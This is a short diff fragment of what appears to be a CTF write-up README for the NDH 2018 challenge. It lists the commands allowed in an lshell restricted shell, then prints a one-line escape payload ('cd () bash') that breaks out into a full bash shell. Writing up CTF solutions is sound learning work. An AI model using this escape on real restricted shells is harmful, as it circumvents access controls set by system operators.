aas-n/ndh2018/README.md

 cd     date  exit  history  lpath  lsudo  whereis clear  echo  help  id       ls     pwd    whoami
 ```
 Now we are `level6_OK`, but into a limited shell.
 We can't do lot of things...
 The hint in home directory tells us that this is `lshell`.
-After some reasearches, we found into github issues of the project [a way to escape](https://image.noelshack.com/fichiers/2018/27/3/1530738563-capture-d-ecran-2018-07-04-a-23-08-30.png) lshell.
+After some researches, we found into lshell github issues a way to [escape](https://image.noelshack.com/fichiers/2018/27/3/1530738563-capture-d-ecran-2018-07-04-a-23-08-30.png) lshell.
 ```bash
 level6_OK:~$ echo FREEDOM! && cd () bash && cd
 FREEDOM!